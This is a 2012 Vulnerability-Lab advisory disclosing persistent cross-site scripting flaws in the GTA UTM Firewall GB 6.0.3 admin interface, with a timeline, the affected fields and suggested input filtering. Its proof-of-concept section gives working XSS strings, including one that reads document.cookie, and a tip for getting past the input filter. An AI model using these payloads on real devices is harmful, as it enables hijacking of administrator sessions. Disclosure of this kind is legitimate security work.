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GTA UTM Firewall GB 6.0.3 Cross Site Scripting

Posted on 02 October 2012

Title: ====== GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities Date: ===== 2012-09-10 References: =========== http://www.vulnerability-lab.com/get_content.php?id=579 VL-ID: ===== 579 Common Vulnerability Scoring System: ==================================== 4 Introduction: ============= The GTA family of Internet security firewall UTM systems has been expanded to include three new gigabit appliances. The GB-2500 Firewall UTM Appliance is one of GTA s most capable firewalls, designed for businesses with extensive network demands. Featuring a powerful Intel Dual-Core processor, two gigabits of RAM and four gigabits of static memory, the GB-2500 easily handles intensive, resource-demanding network configurations. The GB-2100 Firewall UTM Appliance provides robust protection and network reliability for SME organizations. Featuring flexible configuration options, straightforward implementation and uncomplicated maintenance and monitoring, the GB-2100 presents comprehensive protection that is adaptable to any network environment. The GB-820 Firewall UTM Appliance is designed for smaller offices, providing gigabit performance with all the features and tools available in larger appliances, but in a space-saving desktop unit. Built-in VPN acceleration provides the GB-820 with increased throughput, allowing organizations to easily handle periods of increased VPN activity. All GTA Firewall UTM Appliances include our advanced firewall features - policy based NAT, virtual hosting via IP Aliasing, advanced routing such as BGP and Single-Sign on authentication - at no extra charge. Threat management features include DoS and an Intrusion Prevention System (IPS), basic content filtering and advanced email gateway features. (Copy of the Vendor Homepage: http://www.gta.com ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple web Vulnerabilities in the GTA UTM Firewall Firmware GB 6.0.3. Report-Timeline: ================ 2012-05-20: Researcher Notification & Coordination 2012-05-21: Vendor Notification 2012-09-10: Public or Non-Public Disclosure Status: ======== Published Affected Products: ================== Global Technology Assiciates Inc Product: UTM Firewall Appliance Application vGB 6.0.3 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Multiple persistent input validation vulnerabilities are detected in the GTA UTM Firewall Appliance Application Firmware GB 6.0.3. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The first vulnerability is located in the user remote password and pre-shared secret input fields & user account output listing. The secound vulnerability is located in the VPN Certificate emailAddress & subject with affect on the VPN Details Listing section. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin), persistent phishing & stable (persistent) web context manipulation in vulnerable modules or bound application sections. Exploitation requires low or medium user inter action & a low or medium privileged web application user/manager account. Vulnerable Module(s): [+] Users - [Configure -> Accounts -> Users] - > Remote Access > L2TP / PPTP > Remote Password [+] Users - [Configure -> Accounts -> Users] - > Mobile IPSEC > Modify & ASCII > Pre-shared Secret [+] VPN Certificate - Input & Listing Video(s): [+] http://www.vulnerability-lab.com/get_content.php?id=629 Proof of Concept: ================= The persistent input validation vulnerabilities can be exploited by remote attackers with privileged user account & low required user inter action. For demonstration or reproduce ... Note: To bypass the invalid argument filter exception use an onload iframe to request your external content with cookies. Standard frames and script tags with double quotes will be blocked by the invalid argument exception & validation. To verify the bypass use also the wrong standard strings for the invalid argument validation. Locations: remotePW_hidden, identity, form input desc, fullName, Pre-shared Secret, & emailAddress Good Example Bypass String: "><x src=http://www.vuln-lab.com onload=alert("GTA") < or "><x src=http://www.vuln-lab.com onload=alert(document.cookie) < Wrong Example Bypass String: >"<iframe src=http://google.com> or <script>alert("TEST")</script> Review: Users - [Configure -> Accounts -> Users] - > Remote Access > L2TP / PPTP - Password <input name="edit" value="0" type="hidden"><input name="row" value="0" type="hidden"><input id="objRows" name="objRows" value="1" type="hidden"><input id="saltedPW" name="saltedPW" value="$1$_J9..Zyn$m.. Jp/6/lNxwLbwRmteT11" type="hidden"><input id="strength" name="strength" value="95" type="hidden"><input id="secret_hidden" name="secret_hidden" value="" type="hidden"><input id="allowGenCert" name="allowGenCert" value="1" type="hidden"><input id="remotePW_hidden" name="remotePW_hidden" value="" type="hidden"> <iframe src="user-list_data/[PERSISTENT SCRIPT CODE!]' <"=""></td></tr> <tr> <td ... & identity class="forminput" id="identity" name="identity" type="text" size="60" maxlength="127" value=""><iframe src=[PERSISTENT SCRIPT CODE!]& #34;) <" /> </td> </tr> ... & fullName <td colspan="3"><input class="forminput" id="fullName" name="fullName" type="text" size="60" maxlength="59" value=""><iframe src=a [PERSISTENT SCRIPT CODE!]") <" /> </td> </tr> <tr> ... & desc <td colspan="3"><input class="forminput" id="desc" name="desc" type="text" size="60" maxlength="79" value=""><iframe src=a #34;[PERSISTENT SCRIPT CODE!]") <" /> </td> </tr> ... or the secret_hidden <input id="strength" name="strength" value="95" type="hidden"><input id="secret_hidden" name="secret_hidden" value="" type="hidden"><[PERSISTENT SCRIPT CODE!])' <"=""><input id="allowGenCert" name="allowGenCert" type="hidden" value="1" />< URL: http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3 Review: VPN Certificate - Details Listing <tr> <td class="formlabel">Subject:</td> <td>emailAddress = ""><[PERSISTENT SCRIPT CODE!]") <", CN = ""><[PERSISTENT SCRIPT CODE!]") <", O = "><[PERSISTENT SCRIPT CODE!] <", L = "><[PERSISTENT SCRIPT CODE!]) <", ST = "><[PERSISTENT SCRIPT CODE!]) <", C = US, OU = "><i[PERSISTENT SCRIPT CODE!]") <" </td> </tr> Note: The vulnerable content certificate can also be exported via download function to review the problem. URL: http://gta.127.0.0.1/config/vpn/certs/certs-fs_en_6.0.3 Solution: ========= Parse the input field values secret_hidden, remotePW_hidden, identity, form input desc, fullName & emailAddress. Restrict the name input fields with a special filter when processing to load strings with tags like (< > , double quotes & co. ...). Parse also the vulnerable output listing were the script code is getting unsanitized executed out of the waf application context. Risk: ===== The vulnerabilities can be exploited with low required user inter action & privileged user account. The security risk of the persistent input validation vulnerabilities are estimated as medium. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. 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